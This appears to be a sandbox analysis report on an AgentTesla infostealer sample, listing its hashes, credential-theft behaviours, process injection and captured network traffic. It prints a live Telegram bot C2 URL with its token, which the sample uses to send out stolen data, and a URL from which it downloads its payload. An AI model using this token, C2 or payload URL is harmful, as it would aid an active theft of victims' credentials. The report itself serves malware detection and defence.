Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/12/2024, 01:03 UTC

General

  • Target

    243424396-041942-sanlccjavap0003-2745.exe

  • Size

    485KB

  • MD5

    570f75822327ab67501bcf60b5a5015d

  • SHA1

    f8247519442122f8b727910ae977a3072b9e706e

  • SHA256

    3e60205f7f9428199cf532ac669704b7c0b4112f35aa8061d6efc941948e9e35

  • SHA512

    e2aa892438630c43d1fb07d5cf1ecc5781d6a8079385d4095eaa83aba9a5234a78111d396b91499b405adde712c4b6fb6be9db9dc7aaa16d6f5dcc64f3cea912

  • SSDEEP

    6144:aasRfC5mAhrNngWKklCnLUP4igs2fr0hQtP9pDpmIblrsXU/4pd6nscwcT4UyO:erAvguoLUNUrfB99sGlrEpsncM

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Agenttesla family
  • Loads dropped DLL 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\243424396-041942-sanlccjavap0003-2745.exe
    "C:\Users\Admin\AppData\Local\Temp\243424396-041942-sanlccjavap0003-2745.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:4036
    • C:\Users\Admin\AppData\Local\Temp\243424396-041942-sanlccjavap0003-2745.exe
      "C:\Users\Admin\AppData\Local\Temp\243424396-041942-sanlccjavap0003-2745.exe"
      2⤵
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4792

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    232.168.11.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.168.11.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    73.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.144.22.2.in-addr.arpa
    IN PTR
    Response
    73.144.22.2.in-addr.arpa
    IN PTR
    a2-22-144-73deploystaticakamaitechnologiescom
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    154.239.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    154.239.44.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.kupito.ba
    243424396-041942-sanlccjavap0003-2745.exe
    Remote address:
    8.8.8.8:53
    Request
    www.kupito.ba
    IN A
    Response
    www.kupito.ba
    IN CNAME
    kupito.ba
    kupito.ba
    IN A
    51.77.82.235
  • flag-de
    GET
    http://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin
    243424396-041942-sanlccjavap0003-2745.exe
    Remote address:
    51.77.82.235:80
    Request
    GET /css/SGtwXnVLIMcTOSxLvL72.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: www.kupito.ba
    Cache-Control: no-cache
    Response
    HTTP/1.1 301 Moved Permanently
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Sat, 21 Dec 2024 01:04:22 GMT
    server: LiteSpeed
    location: https://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin
  • flag-de
    GET
    https://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin
    243424396-041942-sanlccjavap0003-2745.exe
    Remote address:
    51.77.82.235:443
    Request
    GET /css/SGtwXnVLIMcTOSxLvL72.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: www.kupito.ba
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    content-type: application/octet-stream
    last-modified: Fri, 20 Dec 2024 02:47:29 GMT
    accept-ranges: bytes
    content-length: 240192
    date: Sat, 21 Dec 2024 01:04:23 GMT
    server: LiteSpeed
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
  • flag-us
    DNS
    r11.o.lencr.org
    243424396-041942-sanlccjavap0003-2745.exe
    Remote address:
    8.8.8.8:53
    Request
    r11.o.lencr.org
    IN A
    Response
    r11.o.lencr.org
    IN CNAME
    o.lencr.edgesuite.net
    o.lencr.edgesuite.net
    IN CNAME
    a1887.dscq.akamai.net
    a1887.dscq.akamai.net
    IN A
    2.22.144.142
    a1887.dscq.akamai.net
    IN A
    2.22.144.149
  • flag-us
    DNS
    235.82.77.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    235.82.77.51.in-addr.arpa
    IN PTR
    Response
    235.82.77.51.in-addr.arpa
    IN PTR
    cp2webhostba
  • flag-us
    DNS
    61.45.26.184.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    61.45.26.184.in-addr.arpa
    IN PTR
    Response
    61.45.26.184.in-addr.arpa
    IN PTR
    a184-26-45-61deploystaticakamaitechnologiescom
  • flag-gb
    GET
    http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgPfDP9bv1d%2BZ4m4ePY5fOSmOw%3D%3D
    243424396-041942-sanlccjavap0003-2745.exe
    Remote address:
    2.22.144.142:80
    Request
    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgPfDP9bv1d%2BZ4m4ePY5fOSmOw%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: r11.o.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/ocsp-response
    Content-Length: 504
    ETag: "F907D0DD14501EA8C86F39FC668D0089C52E8B8E21CFB32A4B54EB87B0071FB6"
    Last-Modified: Fri, 20 Dec 2024 23:15:00 UTC
    Cache-Control: public, no-transform, must-revalidate, max-age=21557
    Expires: Sat, 21 Dec 2024 07:03:40 GMT
    Date: Sat, 21 Dec 2024 01:04:23 GMT
    Connection: keep-alive
  • flag-us
    DNS
    142.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    142.144.22.2.in-addr.arpa
    IN PTR
    Response
    142.144.22.2.in-addr.arpa
    IN PTR
    a2-22-144-142deploystaticakamaitechnologiescom
  • flag-us
    DNS
    56.163.245.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.163.245.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    86.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    86.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    api.telegram.org
    243424396-041942-sanlccjavap0003-2745.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    POST
    https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument
    243424396-041942-sanlccjavap0003-2745.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dd215b6f2248ce
    Host: api.telegram.org
    Content-Length: 1365
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Sat, 21 Dec 2024 01:04:36 GMT
    Content-Type: application/json
    Content-Length: 640
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • 51.77.82.235:80
    http://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin
    http
    243424396-041942-sanlccjavap0003-2745.exe
    692 B
    1.2kB
    11
    4

    HTTP Request

    GET http://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin

    HTTP Response

    301
  • 51.77.82.235:443
    https://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin
    tls, http
    243424396-041942-sanlccjavap0003-2745.exe
    11.6kB
    286.7kB
    218
    213

    HTTP Request

    GET https://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin

    HTTP Response

    200
  • 2.22.144.142:80
    http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgPfDP9bv1d%2BZ4m4ePY5fOSmOw%3D%3D
    http
    243424396-041942-sanlccjavap0003-2745.exe
    518 B
    1.1kB
    6
    4

    HTTP Request

    GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgPfDP9bv1d%2BZ4m4ePY5fOSmOw%3D%3D

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument
    tls, http
    243424396-041942-sanlccjavap0003-2745.exe
    2.6kB
    7.4kB
    13
    13

    HTTP Request

    POST https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument

    HTTP Response

    200
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    232.168.11.51.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    232.168.11.51.in-addr.arpa

  • 8.8.8.8:53
    73.144.22.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    73.144.22.2.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    154.239.44.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    154.239.44.20.in-addr.arpa

  • 8.8.8.8:53
    www.kupito.ba
    dns
    243424396-041942-sanlccjavap0003-2745.exe
    59 B
    89 B
    1
    1

    DNS Request

    www.kupito.ba

    DNS Response

    51.77.82.235

  • 8.8.8.8:53
    r11.o.lencr.org
    dns
    243424396-041942-sanlccjavap0003-2745.exe
    61 B
    160 B
    1
    1

    DNS Request

    r11.o.lencr.org

    DNS Response

    2.22.144.142
    2.22.144.149

  • 8.8.8.8:53
    235.82.77.51.in-addr.arpa
    dns
    71 B
    99 B
    1
    1

    DNS Request

    235.82.77.51.in-addr.arpa

  • 8.8.8.8:53
    61.45.26.184.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    61.45.26.184.in-addr.arpa

  • 8.8.8.8:53
    142.144.22.2.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    142.144.22.2.in-addr.arpa

  • 8.8.8.8:53
    56.163.245.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    56.163.245.4.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    86.49.80.91.in-addr.arpa
    dns
    70 B
    145 B
    1
    1

    DNS Request

    86.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    api.telegram.org
    dns
    243424396-041942-sanlccjavap0003-2745.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
    167 B
    1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\nszB7B9.tmp\System.dll

    Filesize

    11KB

    MD5

    cf85183b87314359488b850f9e97a698

    SHA1

    6b6c790037eec7ebea4d05590359cb4473f19aea

    SHA256

    3b6a5cb2a3c091814fce297c04fb677f72732fb21615102c62a195fdc2e7dfac

    SHA512

    fe484b3fc89aeed3a6b71b90b90ea11a787697e56be3077154b6ddc2646850f6c38589ed422ff792e391638a80a778d33f22e891e76b5d65896c6fb4696a2c3b

  • memory/4036-14-0x0000000077961000-0x0000000077A81000-memory.dmp

    Filesize

    1.1MB

  • memory/4036-15-0x0000000010004000-0x0000000010005000-memory.dmp

    Filesize

    4KB

  • memory/4792-16-0x0000000077961000-0x0000000077A81000-memory.dmp

    Filesize

    1.1MB

  • memory/4792-17-0x00000000779E8000-0x00000000779E9000-memory.dmp

    Filesize

    4KB

  • memory/4792-18-0x0000000077A05000-0x0000000077A06000-memory.dmp

    Filesize

    4KB

  • memory/4792-25-0x0000000000450000-0x00000000016A4000-memory.dmp

    Filesize

    18.3MB

  • memory/4792-28-0x0000000077961000-0x0000000077A81000-memory.dmp

    Filesize

    1.1MB

  • memory/4792-27-0x0000000077961000-0x0000000077A81000-memory.dmp

    Filesize

    1.1MB

  • memory/4792-29-0x000000007285E000-0x000000007285F000-memory.dmp

    Filesize

    4KB

  • memory/4792-26-0x0000000000450000-0x00000000016A4000-memory.dmp

    Filesize

    18.3MB

  • memory/4792-30-0x0000000000450000-0x0000000000490000-memory.dmp

    Filesize

    256KB

  • memory/4792-31-0x0000000038B50000-0x00000000390F4000-memory.dmp

    Filesize

    5.6MB

  • memory/4792-32-0x00000000364D0000-0x0000000036536000-memory.dmp

    Filesize

    408KB

  • memory/4792-33-0x0000000072850000-0x0000000073000000-memory.dmp

    Filesize

    7.7MB

  • memory/4792-34-0x00000000394A0000-0x00000000394F0000-memory.dmp

    Filesize

    320KB

  • memory/4792-35-0x00000000394F0000-0x000000003958C000-memory.dmp

    Filesize

    624KB

  • memory/4792-37-0x0000000039950000-0x00000000399E2000-memory.dmp

    Filesize

    584KB

  • memory/4792-38-0x0000000039A30000-0x0000000039A3A000-memory.dmp

    Filesize

    40KB

  • memory/4792-39-0x000000007285E000-0x000000007285F000-memory.dmp

    Filesize

    4KB

  • memory/4792-40-0x0000000072850000-0x0000000073000000-memory.dmp

    Filesize

    7.7MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.